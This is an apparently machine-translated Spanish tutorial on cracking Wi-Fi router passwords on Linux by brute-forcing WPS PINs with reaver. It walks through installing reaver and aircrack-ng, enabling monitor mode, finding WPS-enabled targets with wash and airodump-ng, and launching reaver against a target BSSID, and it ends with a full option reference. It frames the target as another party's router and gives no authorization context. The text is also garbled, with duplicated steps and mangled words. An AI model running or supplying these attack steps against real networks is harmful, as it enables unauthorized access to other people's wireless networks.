En linux, usar reaver para descifrar la contraseña de wifi inalámbrica y utilizar el método

  
Este artículo presenta principalmente los pasos de usar reaver para descifrar la contraseña de wifi inalámbrico en linux. Los amigos pueden consultar las siguientes herramientas: reaver
Principio: Código PIN exhaustivo para romper la seguridad de los enrutadores inalámbricos
Instalación:
Descargar fuente
Desembalar
tar-xzvf reaver-1.4.tar.gz
Instalar las dependencias y herramientas de software necesarias < Br> Antes de compilar reaver, necesita instalar herramientas como pcaplib, luego necesita aircrack-ng
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
Compilar e instalar
Configuración Y compile Reaver
cd reaver-1.4
cd src
./configure
make
Descargue el código fuente de aircrack-ng y compile
aircrack-ng de Ubuntu 12.04 versión ya no más Se incluye en la versión del repositorio de software, pero podemos descargar su código fuente de Internet para compilarlo e instalarlo. Si ya existe aircrack-ng, no es necesario que lo instale. ./configure
make
sudo install
Desempaquetar tar -xzvf reaver-1.4.tar.gz
Instalar las dependencias y herramientas de software necesarias. Debe instalar pcaplib antes de compilar reaver. Herramientas, necesita aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
Compilar e instalar
Configurar y compilar Reaver
cd reaver-1.4 cd src ./configure Make
Install Reaver
sudo make install
Método:
1 Entrada: airmon-ng start wlan0 Encienda el modo de audición (la pantalla muestra que el controlador 8187L se cargó con éxito y ndash; ¡una vez que se cargó con éxito!)
2 Entrada: wash -i mon0 -C Vea todas las rutas inalámbricas que habilitan WPS durante mucho tiempo sin respuesta Presione Ctrl + C para finalizar el proceso, luego escriba el enrutamiento de destino MAC que desea PJ.
3 Entrada: airodump-ng mon0 El NIC escanea todos los canales en modo promiscuo y muestra toda la información de AP (incluida la intensidad de la señal de AP, ESSID, MAC, canal, cifrado, etc. … ..), presione Ctrl + C para finalizar la exploración.
Nota: Si conoce la información de enrutamiento inalámbrico de la otra parte, el paso 2, el paso 3 se puede omitir.
4 Entrada: reaver -i mon0 -b MAC -a -S -vv Inicie el código pin de escape
Nota: Puede presionar CTRL + C para salir del proceso de guardado en cualquier momento, y presionar el botón de control del cursor "ld" la próxima vez.; luego presione Enter y el proceso puede continuar.
Combate Entré en reaver -i mon0 -b MACD8: 5D: 4C: 37: 78: F6 -a -S -vv -d 0 (agregado -d 0 para acelerar), solo veo la pantalla flash … … genial!
detalles de los parámetros de reaver

parámetros requeridos
-i, – interface = < wlan > Nombre de la interfaz en modo monitor para usar en la interfaz de monitoreo de NIC, generalmente mon0
-b , – bssid = < mac > BSSID del AP de destino
AP Dirección MAC
Argumentos opcionales: Parámetros opcionales - -m, – mac = < mac > MAC del sistema host < Br> Especifique la dirección MAC local
-e, – essid = < ssid > ESSID del AP de destino. El ESSID del enrutador, generalmente no especifica
-c, – channel = < channel > Configure el canal 802.11 para la interfaz (implica -f)
El canal de la señal, si no se especifica, escaneará automáticamente -o, – out-file = < file > Enviar salida a un archivo de registro [stdout]
Archivo de registro de salida
-s, – session = < archivo > Restaurar un archivo de sesión anterior
Archivo de progreso de recuperación
-C, – exec = < comando > Ejecute el comando suministrado en Recuperación de pin exitosa
Pulse después de un comando exitoso
-D, – daemonize Daemonize reaver
Establezca reaver en Daemon
-a, – auto Au Para detectar las mejores opciones avanzadas para el punto de acceso de destino
Detectar automáticamente los parámetros avanzados para el punto de acceso de destino
-f, – corregido Deshabilitar el salto de canal
Deshabilitar el salto de canal
-5, – 5ghz Usar 5GHz 802.11 canales
Uso de canales 5G
-v, – verbose Mostrar advertencias no críticas (-vv para obtener más información)
Mostrar mensajes de advertencia sin importancia -vv puede mostrar más
-q, – Silencio Solo muestra mensajes críticos
Mostrar solo información clave
-h, – help Mostrar ayuda
Mostrar ayuda
Opciones avanzadas: Opciones avanzadas
-p, – pin = < wps pin > Use el pin de WPS de 4 u 8 dígitos especificado
Use el código pin de 4 u 8 dígitos especificado
-d, – delay = < seconds > Establezca el retraso entre los intentos de pin [1]
pin Intervalo, valor predeterminado: 1 segundo
-l, – bloqueo-retardo = < segundos > Establezca el tiempo de espera si el AP bloquea el pin WPS [60]
Tiempo de espera del AP después del bloqueo WPS
-g, – max-intentos = < num > Salir después de numear intentos
Máximo de tiempos de pin
Parámetros de Reaver
— Diario
-x, – f Ail-wait = < segundos > Establezca el tiempo de suspensión después de 10 fallas inesperadas [0]
10 espera después de una falla inesperada, 0 segundos predeterminados
-r, – recurring-delay = < x: y > Reposo durante y segundos cada x pin intenta
espera y segundos después de cada x pin
-t, – timeout = < segundos > Establezca el período de espera de recepción [5]
Tiempo de espera de embalaje, Predeterminado 5 segundos
-T, – m57-timeout = < segundos > Establezca el período de espera M5 /M7 [0.20]
Mout /M7 timeout, predeterminado 0.2 segundos
-A, – no- Asociado No asociar con el AP (la asociación debe ser realizada por otra aplicación)
No conectarse al AP (debe haber otros procedimientos para completar el proceso de conexión)
-N, – no-nacks No enviar mensajes NACK cuando Se reciben paquetes fuera de servicio. No envíe información NACK (si ha estado fijando, puede probar este parámetro)
-S, – dh-small Use las teclas DH pequeñas para mejorar la velocidad de rajadura
Use DH pequeña Velocidad de aumento de valor clave (recomendada)
-L, – ignore-locks Ignora el estado de bloqueo reportado por el AP objetivo. Ignorar El estado de bloqueo informado por el AP
-E, – eap-terminate Termine cada sesión de WPS con un paquete EAP FAIL. Cada vez que se recibe un paquete de EAP fallido, el proceso de WPS finaliza en -n, – nack Target AP Siempre envía un NACK [Automático]
Siempre envía un NACK al punto de acceso objetivo, auto predeterminado
-w, – win7 Imite a registrador de Windows
7 [Falso]
Simule el registro de win7, Por defecto,
Ps: Hay muchos factores que afectan la tecnología inalámbrica, por lo que la coordinación entre los parámetros es muy importante. Por supuesto, el más crítico depende de la señal.
Detalles del principio: ¿Qué es un código PIN?
Por supuesto, un conjunto de cadenas de 8 dígitos impreso en la etiqueta del dispositivo del enrutador inalámbrico puede existir en la interfaz de administración del enrutador inalámbrico y puede modificarse.
¿Cuál es el uso de PIN?
En el software de soporte de la tarjeta de red inalámbrica (como el software TP-LINK QSS), ingrese la cadena de 8 dígitos en el dispositivo enrutador inalámbrico para iniciar sesión con éxito en el enrutador inalámbrico cifrado.
¿Qué significa agotar PIN?
Ya que conoce el rango del valor PIN del enrutador inalámbrico (número puro de 8 bits), y la mayoría de los dispositivos actualmente tienen WPS activado, entonces el código PIN exhaustivo para romper la protección de seguridad del enrutador inalámbrico es violento. * Teoría * viabilidad
Copyright © Conocimiento de Windows All Rights Reserved